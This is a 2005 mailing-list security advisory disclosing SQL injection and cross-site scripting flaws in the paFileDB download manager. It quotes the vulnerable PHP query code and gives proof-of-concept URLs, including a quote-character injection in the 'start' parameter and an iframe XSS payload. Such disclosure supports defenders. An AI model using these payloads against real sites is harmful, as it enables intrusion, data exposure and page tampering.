Date: 12 Mar 2005 18:24:42 -0000
From: SecurityReason <sp3x@...urityreason.com>
To: bugtraq@...urityfocus.com
Subject: [SECURITYREASON.COM]  SQL injection and XSS in paFileDB

-=[ SecurityReason-2005-SRA#03 ]=-

-=[ SQL injection and XSS in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for download on their site.
To add a download, all you do is upload the file using FTP or whatever method you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and
delete the files too.
No more messing with a bunch of HTML pages for a file database on your site!
Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is
one of the best and easiest ways to manage files!

SQL injection:
=======================

/includes/viewall.php
/includes/category.php

Code:
if ($sortby == "name") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_name

ASC LIMIT $start,20", 0);
}
if ($sortby == "date") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_time

DESC LIMIT $start,20", 0);
}
if ($sortby == "downloads") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_dls

DESC LIMIT $start,20", 0);
}
if ($sortby == "rating") {
        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY

(file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
}

As we can see the $start variable is vuln for sql injection attack.
But this sql injection for now is not critical , why ? because if we want to inject malicious code to sql sentence

after "ORDER BY" or after "LIMIT", then in current MySql versions, all we can do, is to fail the sql request. No

UNION-s etc. When we try to inject sql sentence we get : "Wrong usage of UNION and ORDER BY Error number: 1221" so we

must wait When Mysql version 4.1 will be widely used then we can have something like this - "ORDER BY desc ASC LIMIT

(SELECT our_table FROM pafiledb_admin)...".

Examples:
=========

Sql injection:
--------------
http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating

error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near '\',20' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY

(file_rating/file_totalvotes - 1) DESC LIMIT \',20

Also in this error message we can see the [prefix] pafiledb tables that should be hidden :)
And we can insert XSS code in error message for example :

Cros Site Scripting (XSS):
--------------------------

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com></iframe

>&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></ifram

e>&sortby=date

error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near '[Our XSS]',20' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY

(file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20

How to fix :
============

Download the new version of the script or update.

Vendor :
========

No respond

Greetz :